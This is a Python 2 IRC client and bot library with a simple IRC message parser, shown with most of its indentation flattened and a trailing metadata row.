# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ref:
# RFC 2812: https://tools.ietf.org/html/rfc2812
# https://www.alien.net.au/irc/irc2numerics.html
#
import socket
import ssl
import sys
import os
import time
import datetime
import string
import random
import threading
import signal
import select
import Queue
class libirc():
BUFLEN = 65535 # buffer to read IRC server message
DEBUG = False
LOGCHAT_NBLINE = 100 # per channel
CONN_TIMEOUT = 5 # second
SELECTTO = 1
ISOPER = False
SSL_CERT_PATH = '/etc/ssl/certs/ca-certificates.crt'
IRC_CMD_QUIT = 'quit'
IRC_CMD_PASS = 'pass'
IRC_CMD_JOIN = 'join' # <channel>
IRC_CMD_USER = 'user' # <username> <hostname> <servername> <realname>
IRC_CMD_NICK = 'nick' # <nickname>
IRC_CMD_PRIVMSG = 'privmsg' # <user> <message>
IRC_CMD_PING = 'ping'
IRC_CMD_PONG = 'pong'
IRC_CMD_LIST = 'list'
IRC_CMD_OPER = 'oper'
IRC_CMD_KICK = 'kick'
IRC_CMD_KILL = 'kill'
IRC_CMD_ERROR = 'error'
IRC_CMD_NAMES = 'names'
IRC_CMD_WHO = 'who'
IRC_CMD_NOTICE = 'notice'
IRC_CMD_CHANNEL = '321'
IRC_CMD_ACHANNEL = '322'
IRC_CMD_CHANNEL_END = '323'
IRC_CMD_MOTD = '375'
IRC_CMD_MTD_END = '376'
IRC_ERR_NICK = '433'
IRC_CMD_CHAN_NAMES = '353'
IRC_CMD_OPER_OK = '381'
# @host: irc server address
# @port: irc server port
    # @ssl: use SSL (True) or not (False)
# @nick: the bot nick
# @channel: the bot channel
# @threaded: is it to be threaded
# TODO really need the threaded option ??
def __init__(self, host, port, ssl, nick, channel, threaded=True):
self._server_host = host
self._server_port = port
self._server_ssl = ssl
self._nick = nick
self._orichannel = channel
        self._threaded = threaded # calls to the callbacks are threaded
# some glob vars
self._pwd = None # server password
self._channels = [] # list of channels
        self._conn_channels = [] # list of channels I have joined
self._nicks = [] # list of nicks on channels I'm on
self._connected = False
self._stop = False
self._logchat = False
self._logchat_logs = {} # for each channel name a list of exchange
self._sndqueue = Queue.Queue()
# callbacks
self._irc_event_on_message = None
self._irc_event_on_privmessage = None
self._irc_event_on_disconnect = None
self._irc_event_on_connect = None
self._irc_event_on_new_channel = None
self._irc_event_on_servping = None
self._irc_event_on_othermsg = None
self._irc_event_on_conn_channel = None
        # dirty hack as signals are not caught by KeyboardInterrupt
signal.signal(signal.SIGINT, self._signal_handler)
def set_password(self, pwd):
self._pwd = pwd
# enable/disable the log chat features
# logs N lines of each channel it is on
def irc_set_logchat(self, boolean):
self._logchat = boolean
def set_callback(self, on_privmessage = None, on_message = None,\
on_disconnect = None, on_connect = None,\
on_new_channel = None, on_servping = None, on_othermsg = None,\
on_conn_chan = None):
self._irc_event_on_privmessage = on_privmessage
self._irc_event_on_message = on_message
self._irc_event_on_disconnect = on_disconnect
self._irc_event_on_connect = on_connect
self._irc_event_on_new_channel = on_new_channel
self._irc_event_on_servping = on_servping
self._irc_event_on_othermsg = on_othermsg
self._irc_event_on_conn_channel = on_conn_chan
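    # Hypothetical usage sketch (not part of the original library; server,
    # channel and handler names are made up):
    #
    #   irc = libirc('irc.example.net', 6697, True, 'mybot', '#mychan')
    #   irc.set_password('secret')
    #   irc.set_callback(on_message=my_handler)
    #   irc.irc_connect()  # blocks in the read loop until disconnected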
def irc_listchannels(self):
if self._socket == None:
return False
self._irc_send_cmd(self.IRC_CMD_LIST, [])
return True
def irc_join_channel(self, chanstr):
if self._socket == None:
return False
if not chanstr in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_JOIN, [chanstr])
self._conn_channels.append(chanstr)
return True
    # send a message to all channels I'm on
def irc_send_to_all_channels(self, msg):
for chan in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
# send a message to a channel
def irc_channel_broadcast(self, chan, msg):
if not self._connected:
return False
if not chan in self._conn_channels:
return False
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
return True
# send a private message to a user
def irc_privmsg(self, user, msg):
if not self._connected:
return False
for i in msg.splitlines():
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [user], [i])
return True
# kill a user
def irc_kill(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
        self._irc_send_cmd(self.IRC_CMD_KILL, [user], [reason])
return True
# kick user from all channels
def irc_kick_all(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self.irc_kick(user, '*', reason)
return True
# kick a user from a channel
# syntax: kick <channel> <user> <reason>
def irc_kick(self, user, channel, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
        # RFC syntax is KICK <channel> <user> :<reason> (see comment above)
        self._irc_send_cmd(self.IRC_CMD_KICK, [channel, user], [reason])
return True
# do we know this user
def irc_known_nick(self, user):
return (user in self._nicks)
    # 0 means all lines
def irc_get_chan_logs(self, chan, nbline=0):
nbline = int(nbline)
if not self._logchat:
return None
if not chan in self._logchat_logs:
return None
if nbline == 0 or nbline > len(self._logchat_logs[chan]):
return self._logchat_logs[chan]
else:
tmp = self._logchat_logs[chan][-nbline:]
return tmp
def _signal_handler(self, signum, frame):
self._stop = True
# timestamp to string
def _ts2str(self, ts):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# print debug message
def _irc_debug(self, txt):
datestr = self._ts2str(time.time())
sys.stderr.write("[IRC] <" + datestr + "> " + txt + "\n")
# print error message
def _irc_err(self, txt):
sys.stderr.write("[IRC ERROR] " + txt)
# this is the main loop reading from the socket
def _irc_read_loop(self):
success = True
self._irc_debug('bot started (read loop started) ....')
self._socket.setblocking(0)
try:
while not self._stop:
try:
wsocks = []
rsocks = [self._socket]
esocks = [self._socket]
if not self._sndqueue.empty():
wsocks.append(self._socket)
iready,oready,eready = select.select(rsocks, wsocks, esocks,
self.SELECTTO)
if self._socket in eready:
self._irc_debug('[ERROR] socket error in select')
if self._socket in oready and not self._sndqueue.empty():
data = self._sndqueue.get()
self._socket.send(data)
if self._socket in iready:
data = self._socket.recv(self.BUFLEN)
for line in data.splitlines():
if not self._irc_handle_line(line):
# not very resilient
success = False
break
if not success:
break
except socket.error as serr:
#pass
# TODO
self._irc_err('socket error')
print serr
except select.error as serr:
#pass
# TODO
self._irc_err('select error')
print serr
except KeyboardInterrupt:
print 'interrupted ...'
self._irc_debug('bot ended (read loop exited)')
return success
# handle anything that appears on the IRC and that I see
def _irc_handle_line(self, line):
if line == None or line == '':
return True
#try:
if self.DEBUG:
self._irc_debug("<- " + line)
# TODO from here
msg = ircmsg(line)
if msg.cmd == self.IRC_CMD_CHANNEL:
# start of channel list
self._irc_debug('start of channel listing')
elif msg.cmd == self.IRC_CMD_CHANNEL_END:
# end of channel list
self._irc_debug('end of channel listing')
elif msg.cmd == self.IRC_CMD_ACHANNEL:
# new channel
self._irc_debug('<- new channel: %s' % (msg.param[1]))
self._channels.append(msg.param[1])
if self._irc_event_on_new_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_new_channel,
args=(msg.param[1],))
t.start()
else:
                    self._irc_event_on_new_channel(msg.param[1])
elif msg.cmd == self.IRC_CMD_MTD_END:
# end of MOTD
self._irc_debug('joining channel: %s' % (self._orichannel))
self._connected = True
self.irc_join_channel(self._orichannel)
elif msg.cmd == self.IRC_CMD_OPER_OK:
self.ISOPER = True
elif msg.cmd == self.IRC_ERR_NICK:
# nick registration error
self._nick = self._nick + "^"
self._irc_debug('changing nick to: %s' % (self._nick))
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick])
elif msg.cmd == self.IRC_CMD_PING:
# this is a PING from server
self._irc_debug('<- \"ping\"')
            # echo back the ping token; the naive parser stores it in
            # msg.msg (trailing part) or msg.param, never in msg.src
            self._irc_send_cmd(self.IRC_CMD_PONG, msg.param + msg.msg)
if self._irc_event_on_servping != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_servping)
t.start()
else:
self._irc_event_on_servping()
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] == self._nick:
# this is a private message sent to myself
self._irc_debug('<- private message to me')
if self._irc_event_on_privmessage != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_privmessage, args=(msg,))
t.start()
else:
self._irc_event_on_privmessage(msg)
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] != self._nick:
# this is a message sent to a channel I'm on
self._irc_debug('<- message in channel: %s' % (msg.param[0]))
if self._irc_event_on_message != None:
if self._logchat:
self._irc_log(msg)
if self._threaded:
t = threading.Thread(target=self._irc_event_on_message, args=(msg,))
t.start()
else:
self._irc_event_on_message(msg)
elif msg.cmd == self.IRC_CMD_JOIN:
if msg.user != self._nick:
                # another user joined our channel
self._nicks.append(msg.user)
else:
if msg.msg[0] in self._conn_channels:
if self._irc_event_on_conn_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_conn_channel,
args=(msg.msg[0],))
t.start()
else:
self._irc_event_on_conn_channel(msg.msg[0])
elif msg.cmd == self.IRC_CMD_CHAN_NAMES:
# list of names in the channel
for u in msg.msg:
if not u in self._nicks and u != self._nick:
self._nicks.append(u)
self._irc_debug('nicks list updated: %s' % (','.join(self._nicks)))
elif msg.cmd == self.IRC_CMD_ERROR:
# oops some error
self._irc_debug('ERROR ! (%s)' % (' '.join(msg.msg)))
return False
elif msg.cmd == self.IRC_CMD_NOTICE:
# this is a notice
self._irc_debug('notice received: %s %s' % (msg.param[0],
' '.join(msg.msg)))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
else:
# this is what's left
#self._irc_debug('other message received: %s' % (msg.cmd))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
#except Exception as msg:
# print msg
# exc_type, exc_obj, exc_tb = sys.exc_info()
# fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
# print exc_type, fname, exc_tb.tb_lineno
# return False
return True
def _irc_log(self, ircmsg):
user = ircmsg.user
chan = ircmsg.param[0]
msg = ' '.join(ircmsg.msg)
if chan in self._logchat_logs:
tmp = self._logchat_logs[chan]
            if len(tmp) > self.LOGCHAT_NBLINE:
# remove one
del tmp[0]
tmp.append('[%s] %s' % (user, msg))
self._logchat_logs[chan] = tmp
else:
l = ['[%s] %s' % (user, msg)]
self._logchat_logs[chan] = l
# send an IRC command to the server
    # params are space-separated arguments; msg, if given, is sent as the
    # trailing part (prefixed with ':') and may therefore contain spaces
def _irc_send_cmd(self, cmd, params, msg=[], log=True):
if self._socket == None:
return False
data = '%s %s' % (cmd, ' '.join(params))
if msg != []:
data += ' :%s' % (' '.join(msg))
data += '\n'
if log:
self._irc_debug('-> \"%s\"' % (data.rstrip()))
self._sndqueue.put(data)
return True
# connect to IRC server
def irc_connect(self):
sock = None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if self._server_ssl:
# https://docs.python.org/2/library/ssl.html
sock = ssl.wrap_socket(s, server_side=False)
else:
sock = s
sock.settimeout(self.CONN_TIMEOUT)
sock.connect((self._server_host, int(self._server_port)))
sock.settimeout(None)
except socket.error as err:
self._irc_err("Connection error: ")
print err
if self._server_ssl:
sock.unwrap()
sock.close()
return False
self._irc_debug("IRC socket connected!")
self._socket = sock
if self._irc_event_on_connect != None:
self._irc_debug('calling connect callback ...')
if self._threaded:
t = threading.Thread(target=self._irc_event_on_connect)
t.start()
else:
self._irc_event_on_connect()
#self._irc_debug('calling read-loop ...')
#t = threading.Thread(target=self._irc_read_loop)
#t.start()
# conn and nick
time.sleep(1)
self._irc_debug('sending nick and other information to the server ...')
        if self._pwd != None:
            self._irc_send_cmd(self.IRC_CMD_PASS, [self._pwd], log=False)
self._irc_send_cmd(self.IRC_CMD_USER, [self._nick, self._nick, self._nick], [self._nick], log=False)
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick], log=False)
# start the read loop
self._irc_debug('calling read-loop ...')
res = self._irc_read_loop()
try:
if self._server_ssl:
self._socket.unwrap()
except:
pass
self._socket.close()
return res
def irc_gooper(self, username, password):
if username != '' and password != '':
self._irc_debug('going operator ...')
self._irc_send_cmd(self.IRC_CMD_OPER, [username, password], log=False)
    # disconnect from the IRC server and close the socket
def irc_disconnect(self):
# first send the quit command
self._irc_debug('disconnecting ...')
self._stop = True
        if self._socket != None and self._connected:
self._irc_debug("sending the IRC quit command !")
self._irc_send_cmd(self.IRC_CMD_QUIT, [])
# close the socket
if self._socket != None:
self._socket.close()
self._irc_debug('calling disconnect callback...')
if self._irc_event_on_disconnect != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_disconnect)
t.start()
else:
self._irc_event_on_disconnect()
class ircmsg():
DEBUG = False
def __init__(self, line):
self._line = line
self.user = '' # the user that sent the message
self.src = '' # the address of the user (username@IP)
self.cmd = '' # the IRC command in the message
self.param = [] # the target of the message (#<channel> or user)
self.msg = [] # the message
self._parse_line()
# this is a naive parser
def _parse_line(self):
# format:
# :<prefix> <command> <params> :<trailing>
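        # e.g. ':nick!user@host PRIVMSG #chan :hello world' parses to
        #   user='nick', src='user@host', cmd='privmsg',
        #   param=['#chan'], msg=['hello', 'world']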
#try:
# identify the parts
if self.DEBUG:
self._err('full line: \"%s\"' % (self._line))
prefixend = 0
trailingstart = len(self._line)
if self._line.startswith(':'):
# prefix
dummy = self._line[1:]
prefix = dummy.split(' ')[0]
prefixend = len(prefix)+1
if '!' in prefix:
self.user = prefix.split('!')[0].lower()
self.src = prefix.split('!')[1].lower()
else:
self.src = prefix
if self.DEBUG:
self._err('prefix: %s' % (prefix))
if ' :' in self._line:
# trailing
trailing = self._line.split(' :')[1]
trailingstart = self._line.index(' :')
if self.DEBUG:
self._err('trailing: %s' % (trailing))
self.msg = [x.lower() for x in trailing.split(' ')]
cmdparams = self._line[prefixend:trailingstart].strip()
if self.DEBUG:
self._err('cmdparams: %s' % (cmdparams))
self.cmd = cmdparams.split(' ')[0].lower()
self.param = [x.lower() for x in cmdparams.split(' ')[1:]]
#except:
# self._err(self._line)
if self.DEBUG:
self.print_msg()
def _err(self, string):
sys.stderr.write('[IRCMSG] %s\n' % (string))
def print_msg(self):
self._err('Message (%s)' % (self._line))
self._err('\tuser: %s' % (self.user))
self._err('\tsrc: %s' % (self.src))
self._err('\tcmd: %s' % (self.cmd))
self._err('\tparam: %s' % (','.join(self.param)))
self._err('\tmsg: %s' % (','.join(self.msg)))
| gpl-2.0 | -3,772,198,053,339,212,000 | 31.39576 | 104 | 0.602694 | false |